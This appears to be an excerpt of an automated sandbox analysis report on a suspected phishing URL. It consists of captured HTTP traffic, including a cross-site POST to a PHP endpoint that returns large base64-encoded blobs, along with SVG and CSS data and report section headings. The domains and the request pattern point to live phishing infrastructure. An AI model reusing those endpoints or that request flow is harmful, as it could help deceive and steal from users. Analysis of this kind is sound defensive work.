2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 33 35 33 20 39 35 2e 39 36 31 31 20 36 38 2e 36 38 36 38 20 39 34 2e 30 34 34 35 43 35 39 2e 30 33 38 34 20 39 32 2e 31 32 37 38 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 36 2e 31 37 36 20 31 31 31 2e 39 35 33 43 31 33 36 2e 31 37 36 20 31 31 33 2e 32 38 31 20 31 33 36 2e 37 30 34 20 31 31 34 2e 35 35 35 20 31 33 37 2e 36 34 33 20 31 31 35 2e 34 39 34 43 31 33 38 2e 35 38 32 20 31 31 36 2e 34 33 33 20 31 33 39 2e 38 35 36 20 31 31 36 2e 39 36 31 20 31 34 31 2e 31 38 34 20 31 Data Ascii: 353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406Z" fill="#0055DC" /> <path d="M136.176 111.953C136.176 113.281 136.704 114.555 137.643 115.494C138.582 116.433 139.856 116.961 141.184 1
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 37 30 31 20 31 31 31 2e 32 39 35 20 31 31 39 2e 37 30 31 20 31 31 31 2e 39 35 33 56 31 31 31 2e 39 35 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 33 38 34 20 31 31 31 2e 39 35 33 43 31 30 33 2e 33 38 34 20 31 31 32 2e 36 31 32 20 31 30 33 2e 35 31 33 20 31 31 33 2e 32 36 34 20 31 30 33 2e 37 36 36 20 31 31 33 2e 38 37 32 43 31 30 34 2e 30 31 38 20 31 31 34 2e 34 38 20 31 30 34 2e 33 38 37 20 31 31 35 2e 30 33 32 20 31 30 34 2e 38 35 33 20 31 31 35 2e 34 39 37 43 31 30 35 2e 33 31 39 20 31 31 35 2e 39 36 32 20 31 30 35 2e 38 37 32 20 31 31 36 2e 33 33 31 20 31 30 Data Ascii: 701 111.295 119.701 111.953V111.953Z" fill="#0055DC" /> <path d="M103.384 111.953C103.384 112.612 103.513 113.264 103.766 113.872C104.018 114.48 104.387 115.032 104.853 115.497C105.319 115.962 105.872 116.331 10
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 34 37 38 20 34 35 2e 30 36 32 37 20 31 34 34 2e 35 38 39 20 34 38 2e 39 35 31 36 20 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 38 2e 38 32 31 20 34 38 2e 39 35 31 36 43 31 30 34 2e 30 32 34 20 34 38 2e 39 35 31 36 20 31 30 30 2e 31 33 35 20 34 35 2e 30 36 32 Data Ascii: 478 45.0627 144.589 48.9516 139.792 48.9516Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10" /> <path d="M108.821 48.9516C104.024 48.9516 100.135 45.062
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 2e 36 35 36 20 33 36 2e 35 34 37 34 20 31 31 32 2e 35 38 36 20 33 36 2e 31 30 35 32 20 31 31 31 2e 34 37 32 20 33 36 2e 31 30 35 32 43 31 31 30 2e 33 35 38 20 33 36 2e 31 30 37 33 20 31 30 39 2e 32 39 31 20 33 36 2e 35 35 30 36 20 31 30 38 2e 35 30 34 20 33 37 2e 33 33 37 38 43 31 30 37 2e 37 31 37 20 33 38 2e 31 32 35 20 31 30 37 2e 32 37 34 20 33 39 2e 31 39 32 31 20 31 30 37 2e 32 37 31 20 34 30 2e 33 30 35 35 56 34 30 2e 33 30 35 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 38 34 2e 38 39 31 38 20 31 32 37 2e 35 38 31 48 31 36 34 2e 39 36 37 43 31 37 33 2e 33 34 35 20 31 Data Ascii: .656 36.5474 112.586 36.1052 111.472 36.1052C110.358 36.1073 109.291 36.5506 108.504 37.3378C107.717 38.125 107.274 39.1921 107.271 40.3055V40.3055Z" fill="#6ECCE5" /> <path d="M84.8918 127.581H164.967C173.345 1
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 20 73 74 79 6c 65 3d 22 6d 69 78 2d 62 6c 65 6e 64 2d 6d 6f 64 65 3a 20 6d 75 6c 74 69 70 6c 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 30 37 34 20 31 34 32 2e 38 33 31 43 31 30 33 2e 30 33 38 20 31 34 35 2e 33 39 35 20 31 30 34 2e 30 32 31 20 31 34 37 2e 38 36 39 20 31 30 35 2e 38 30 38 20 31 34 39 2e 37 30 39 43 31 30 37 2e 35 39 35 20 31 35 31 2e 35 34 39 20 31 31 30 2e 30 33 39 20 31 35 32 2e 36 30 33 20 31 31 32 2e 36 30 34 20 31 35 32 2e 36 Data Ascii: 1Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M103.074 142.831C103.038 145.395 104.021 147.869 105.808 149.709C107.595 151.549 110.039 152.603 112.604 152.6
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 37 35 2e 36 33 35 48 31 33 34 2e 39 33 34 56 37 39 2e 37 33 37 39 48 31 32 39 2e 38 35 32 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 38 37 2e 30 31 34 31 48 31 34 32 2e 31 37 37 56 39 31 2e 31 30 38 39 48 31 33 37 2e 30 38 37 56 38 37 2e 30 31 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 Data Ascii: /> <path d="M129.852 75.635H134.934V79.7379H129.852V75.635Z" fill="#0055DC" /> <path d="M137.087 87.0141H142.177V91.1089H137.087V87.0141Z" fill="#0055DC" />

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:19 UTC	716	OUT	POST /awazwwazq/host%5b24.0%5d/dd49311.php HTTP/1.1 Host: grupoej.com Connection: keep-alive Content-Length: 47 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:19 UTC	47	OUT	Data Raw: 73 63 74 65 3d 26 61 75 74 6f 3d 66 61 6c 73 65 26 66 3d 57 79 4a 6c 62 53 49 73 49 6d 56 74 59 57 6c 73 49 69 77 69 59 57 52 6b 49 6c 30 3d Data Ascii: scte=&auto=false&f=WyJlbSIsImVtYWlsIiwiYWRkIl0=
2024-04-18 17:39:20 UTC	517	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 17:39:19 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS Set-Cookie: PHPSESSID=ff6d9162040784175cdc6207967b4085; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-04-18 17:39:20 UTC	7675	IN	Data Raw: 34 30 30 30 0d 0a 63 33 4e 43 64 33 70 51 53 31 64 72 52 55 4e 50 65 55 63 33 53 6b 5a 70 4c 32 78 79 64 6c 56 48 65 58 4a 56 52 6e 64 71 56 6b 31 58 53 56 56 57 53 47 5a 56 51 32 6b 78 5a 33 64 6d 4f 54 4a 31 51 31 41 78 59 33 45 72 63 6d 52 70 54 55 31 58 53 55 46 46 4d 33 51 35 59 6b 74 53 57 6b 52 73 65 47 68 4c 64 7a 42 59 54 31 4e 6d 63 54 5a 52 64 33 42 58 5a 33 68 53 63 6e 52 34 5a 31 68 74 63 31 4a 43 55 30 38 77 64 79 74 75 56 48 51 35 5a 57 5a 59 61 55 35 31 55 55 73 33 52 30 78 58 51 57 39 56 5a 44 56 4c 54 47 70 33 4e 56 4a 6a 51 31 6c 46 51 30 4a 74 4d 57 52 50 53 6b 68 74 55 44 45 33 54 46 68 55 62 33 6b 31 54 6d 4e 4c 62 31 64 7a 4b 30 4e 49 4c 33 52 70 56 6c 4a 44 5a 47 73 32 63 45 78 72 61 7a 5a 50 64 56 52 76 65 58 70 45 4d 30 4e 53 55 Data Ascii: 4000c3NCd3pQS1drRUNPeUc3SkZpL2xydlVHeXJVRndqVk1XSVVWSGZVQ2kxZ3dmOTJ1Q1AxY3ErcmRpTU1XSUFFM3Q5YktSWkRseGhLdzBYT1NmcTZRd3BXZ3hScnR4Z1htc1JCU08wdytuVHQ5ZWZYaU51UUs3R0xXQW9VZDVLTGp3NVJjQ1lFQ0JtMWRPSkhtUDE3TFhUb3k1TmNLb1dzK0NIL3RpVlJDZGs2cExrazZPdVRveXpEM0NSU
2024-04-18 17:39:20 UTC	8715	IN	Data Raw: 6a 4e 4c 57 44 56 79 54 48 5a 4e 55 33 70 48 61 57 31 68 63 47 51 32 53 6d 70 4a 4b 32 68 79 56 6a 6c 79 64 6d 4a 33 4c 30 59 72 4e 45 52 5a 4e 44 42 4e 65 58 6b 72 62 44 42 76 4d 6d 4d 76 56 53 39 77 57 47 4e 6e 65 55 4a 5a 55 45 64 6e 4d 55 64 4f 56 56 46 36 5a 48 59 30 54 46 5a 4d 53 45 78 4f 4d 31 64 71 52 55 31 6d 4e 6b 5a 69 51 55 63 7a 52 31 4e 61 63 45 4a 33 64 31 6c 7a 65 55 68 4a 56 45 46 5a 54 33 41 79 56 57 4a 32 52 48 64 45 57 55 39 59 53 6c 4a 72 55 55 46 46 52 7a 68 4c 4b 7a 64 43 53 56 68 4e 61 47 74 4f 56 6a 4a 72 53 56 68 49 62 32 70 32 52 33 6c 6e 59 6b 39 6d 52 54 4a 75 4c 30 5a 76 4d 48 70 6a 59 6d 4a 5a 56 46 4a 48 59 6a 41 30 51 58 52 50 57 57 4a 78 4e 6b 6c 4b 4f 47 31 32 52 7a 5a 36 61 6c 52 6e 64 6d 78 6d 53 6d 56 72 4c 30 70 61 Data Ascii: jNLWDVyTHZNU3pHaW1hcGQ2SmpJK2hyVjlydmJ3L0YrNERZNDBNeXkrbDBvMmMvVS9wWGNneUJZUEdnMUdOVVF6ZHY0TFZMSExOM1dqRU1mNkZiQUczR1NacEJ3d1lzeUhJVEFZT3AyVWJ2RHdEWU9YSlJrUUFFRzhLKzdCSVhNaGtOVjJrSVhIb2p2R3lnYk9mRTJuL0ZvMHpjYmJZVFJHYjA0QXRPWWJxNklKOG12RzZ6alRndmxmSmVrL0pa
2024-04-18 17:39:20 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-04-18 17:39:20 UTC	8192	IN	Data Raw: 34 30 30 30 0d 0a 56 46 5a 70 5a 53 74 6a 51 33 5a 59 5a 6c 4e 7a 4f 48 52 32 57 6d 6c 48 51 53 38 79 56 57 74 76 61 54 68 6a 4b 31 52 4f 64 44 42 34 51 6d 6c 57 54 55 4e 35 62 45 52 6b 56 56 5a 42 54 33 4e 50 4c 32 31 30 53 46 49 32 55 6d 4a 6d 55 6a 56 6c 4b 32 56 36 53 6c 56 49 57 6d 51 76 53 45 64 6f 4f 47 4e 58 5a 58 52 36 63 30 31 6e 59 6a 51 30 53 6b 64 74 65 6d 6c 44 57 47 35 74 63 32 64 6a 56 54 5a 54 62 6c 46 49 61 31 56 35 62 33 5a 42 63 47 52 53 53 6b 56 74 64 6a 4e 34 62 46 42 32 59 6b 39 33 65 53 74 55 4e 47 35 43 4f 58 42 4c 63 47 56 70 51 32 31 71 55 6d 34 33 52 6e 68 4e 56 47 31 6f 59 33 6c 54 62 79 39 43 4e 6d 6c 47 52 7a 56 69 4d 31 59 7a 64 32 35 33 5a 54 4e 74 52 6b 46 76 61 33 46 57 62 56 68 43 5a 33 70 56 52 44 42 71 65 6d 70 34 63 Data Ascii: 4000VFZpZStjQ3ZYZlNzOHR2WmlHQS8yVWtvaThjK1ROdDB4QmlWTUN5bERkVVZBT3NPL210SFI2UmJmUjVlK2V6SlVIWmQvSEdoOGNXZXR6c01nYjQ0SkdtemlDWG5tc2djVTZTblFIa1V5b3ZBcGRSSkVtdjN4bFB2Yk93eStUNG5COXBLcGVpQ21qUm43RnhNVG1oY3lTby9CNmlGRzViM1Yzd253ZTNtRkFva3FWbVhCZ3pVRDBqemp4c
2024-04-18 17:39:20 UTC	8198	IN	Data Raw: 5a 71 5a 45 35 71 4c 31 63 77 53 55 6c 71 4b 30 74 69 52 54 46 43 59 55 55 33 51 79 39 6d 4e 57 4e 4e 57 47 64 71 63 44 4a 46 51 57 6c 51 56 57 70 61 52 46 70 71 4e 6b 77 78 4d 6d 5a 51 52 79 74 78 4e 46 4e 32 55 54 4a 47 55 6e 68 32 54 30 74 4c 54 69 39 56 56 53 39 52 62 32 4a 73 55 44 42 53 61 6b 52 77 65 47 74 4f 54 55 74 48 5a 7a 52 6e 4d 6a 68 6b 54 58 52 4a 5a 44 4a 7a 57 6d 6c 4e 65 47 77 7a 65 57 55 72 55 31 52 77 52 6d 31 7a 52 46 46 4d 57 57 56 56 62 31 5a 30 57 55 6c 56 63 6d 35 46 52 6a 6c 53 52 6a 4a 72 4b 31 70 43 4e 6c 41 7a 63 46 6c 47 64 44 64 70 54 30 78 49 61 44 64 53 61 7a 42 4b 63 46 6f 7a 61 30 78 73 4e 30 74 31 54 6b 4e 68 56 57 52 31 4e 44 59 79 63 7a 4a 68 63 6e 6c 6b 5a 32 4a 7a 51 30 39 59 63 32 46 54 59 6d 4e 42 53 6a 46 6d 51 Data Ascii: ZqZE5qL1cwSUlqK0tiRTFCYUU3Qy9mNWNNWGdqcDJFQWlQVWpaRFpqNkwxMmZQRytxNFN2UTJGUnh2T0tLTi9VVS9Rb2JsUDBSakRweGtOTUtHZzRnMjhkTXRJZDJzWmlNeGwzeWUrU1RwRm1zRFFMWWVVb1Z0WUlVcm5FRjlSRjJrK1pCNlAzcFlGdDdpT0xIaDdSazBKcFoza0xsN0t1TkNhVWR1NDYyczJhcnlkZ2JzQ09Yc2FTYmNBSjFmQ
2024-04-18 17:39:20 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-04-18 17:39:20 UTC	8192	IN	Data Raw: 34 30 30 30 0d 0a 61 33 56 30 57 6e 64 56 4d 45 6c 46 56 45 78 73 55 58 42 77 4e 56 6c 76 57 56 45 32 4f 47 34 7a 4d 55 45 35 59 55 74 73 5a 7a 64 68 52 56 46 7a 4c 33 4e 35 4e 47 74 6c 5a 30 68 77 62 56 5a 47 61 30 52 72 64 55 64 4f 61 46 63 76 52 6d 6c 50 52 33 55 32 65 45 39 74 53 48 46 55 64 46 56 70 59 33 68 74 56 46 51 34 61 57 39 50 4d 47 4e 44 53 58 51 33 4c 31 42 52 63 7a 46 49 65 6c 49 30 62 6b 6c 51 56 48 52 43 63 55 31 36 4e 46 59 31 61 6d 55 34 52 6b 4e 7a 56 6e 4e 44 57 57 4e 6b 56 47 70 45 57 57 4a 48 53 69 39 75 54 47 63 78 65 56 5a 43 62 44 52 6e 4f 55 4a 4a 59 6d 55 7a 4d 56 56 76 65 6b 31 4a 62 33 68 31 53 56 64 79 61 6b 55 76 4c 33 55 79 5a 57 35 49 63 56 5a 35 53 44 64 4f 4f 56 64 4f 64 57 64 7a 5a 6b 51 7a 59 6b 56 5a 61 33 4e 46 65 Data Ascii: 4000a3V0WndVMElFVExsUXBwNVlvWVE2OG4zMUE5YUtsZzdhRVFzL3N5NGtlZ0hwbVZGa0RrdUdOaFcvRmlPR3U2eE9tSHFUdFVpY3htVFQ4aW9PMGNDSXQ3L1BRczFIelI0bklQVHRCcU16NFY1amU4RkNzVnNDWWNkVGpEWWJHSi9uTGcxeVZCbDRnOUJJYmUzMVVvek1Jb3h1SVdyakUvL3UyZW5IcVZ5SDdOOVdOdWdzZkQzYkVZa3NFe
2024-04-18 17:39:20 UTC	8198	IN	Data Raw: 4a 73 53 58 59 35 56 30 63 7a 4d 47 4a 30 56 56 70 61 4e 55 59 35 65 6a 4a 4b 64 45 67 32 51 6d 78 69 59 6a 68 33 62 33 56 34 4f 47 78 4b 53 32 70 4a 64 48 68 79 53 47 6b 34 53 6d 39 61 51 6e 6c 54 59 57 46 52 54 31 4a 59 4e 33 6f 79 62 46 49 32 57 45 73 32 54 56 4a 59 65 6b 74 31 62 6d 70 6d 61 6a 42 78 54 54 46 77 4b 30 56 71 56 58 5a 46 5a 32 46 4a 53 53 74 30 64 44 67 78 4d 57 52 58 4e 45 51 78 64 6e 70 33 61 6b 68 4b 54 46 41 33 5a 55 59 35 4e 58 6c 6b 65 57 38 7a 53 6a 6c 56 4e 6e 68 71 65 6c 68 4b 52 55 49 72 57 58 52 44 4e 6d 30 34 55 55 78 42 5a 55 6b 31 52 31 5a 75 54 48 70 30 51 6a 46 45 61 7a 68 45 65 47 52 44 4e 57 56 77 52 6d 39 46 5a 32 35 74 55 6e 4a 61 52 6a 68 73 54 6c 4a 35 55 48 56 52 4d 47 77 77 4e 54 41 32 62 54 4d 7a 54 33 49 32 62 Data Ascii: JsSXY5V0czMGJ0VVpaNUY5ejJKdEg2QmxiYjh3b3V4OGxKS2pJdHhySGk4Sm9aQnlTYWFRT1JYN3oybFI2WEs2TVJYekt1bmpmajBxTTFwK0VqVXZFZ2FJSSt0dDgxMWRXNEQxdnp3akhKTFA3ZUY5NXlkeW8zSjlVNnhqelhKRUIrWXRDNm04UUxBZUk1R1ZuTHp0QjFEazhEeGRDNWVwRm9FZ25tUnJaRjhsTlJ5UHVRMGwwNTA2bTMzT3I2b
2024-04-18 17:39:20 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:21 UTC	371	OUT	GET /awazwwazq/host%5b24.0%5d/dd49311.php HTTP/1.1 Host: grupoej.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:21 UTC	485	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 17:39:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS Set-Cookie: PHPSESSID=a23457bc0d184f502743b3fac7bc281a; path=/ Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://znixulyp.com/vGgw6o

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 126

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Chrome Cache Entry: 130

Chrome Cache Entry: 131

Chrome Cache Entry: 132

Chrome Cache Entry: 133

Chrome Cache Entry: 134

Chrome Cache Entry: 135

Chrome Cache Entry: 136

Chrome Cache Entry: 137

Chrome Cache Entry: 138

Chrome Cache Entry: 139

Chrome Cache Entry: 140

Chrome Cache Entry: 141

Chrome Cache Entry: 142

Chrome Cache Entry: 143

Chrome Cache Entry: 144

Chrome Cache Entry: 145

Chrome Cache Entry: 146

Chrome Cache Entry: 147

Windows Analysis Report
https://znixulyp.com/vGgw6o

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:21 UTC	668	OUT	GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.css HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: style Referer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:21 UTC	945	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 17:39:21 GMT Content-Type: text/css; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03e5f-9226" Last-Modified: Mon, 04 May 2020 16:10:07 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 61382 Expires: Tue, 08 Apr 2025 17:39:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ohPTj53xPgPkT6PTvk%2Bt4mnAN5%2FUZapckY4hdMthZCFKce2WE3yGBfBaMSpSFzXt6gma%2B0MdA9NbFbaqNAgDns6TqtPx8ldIhD8sVND5v5BCi5jwXCaLdy7mbC%2FigLVB59pmQDDb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 87666f0d39544505-ATL alt-svc: h3=":443"; ma=86400
2024-04-18 17:39:21 UTC	424	IN	Data Raw: 37 62 66 65 0d 0a 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 0a 2f 2a 20 46 4f 4e 54 20 50 41 54 48 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 46 6f 6e 74 41 77 65 73 Data Ascii: 7bfe/! Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) // FONT PATH * -------------------------- */@font-face { font-family: 'FontAwes
2024-04-18 17:39:21 UTC	1369	IN	Data Raw: 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 32 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 74 74 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 3f 76 3d 34 2e 37 2e 30 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 27 29 20 66 6f 72 6d Data Ascii: ntawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') form
2024-04-18 17:39:21 UTC	1369	IN	Data Raw: 65 6d 3b 0a 7d 0a 2f 2a 20 44 65 70 72 65 63 61 74 65 64 20 61 73 20 6f 66 20 34 2e 34 2e 30 20 2a 2f 0a 2e 70 75 6c 6c 2d 72 69 67 68 74 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 70 75 6c 6c 2d 6c 65 66 74 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 7d 0a 2e 66 61 2e 70 75 6c 6c 2d 6c 65 66 74 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 2e 33 65 6d 3b 0a 7d 0a 2e 66 61 2e 70 75 6c 6c 2d 72 69 67 68 74 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2e 33 65 6d 3b 0a 7d 0a 2e 66 61 2d 73 70 69 6e 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 20 66 61 2d 73 70 69 6e 20 32 73 20 69 6e 66 69 6e 69 74 65 20 6c 69 6e 65 61 72 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 66 61 2d 73 70 Data Ascii: em;}/* Deprecated as 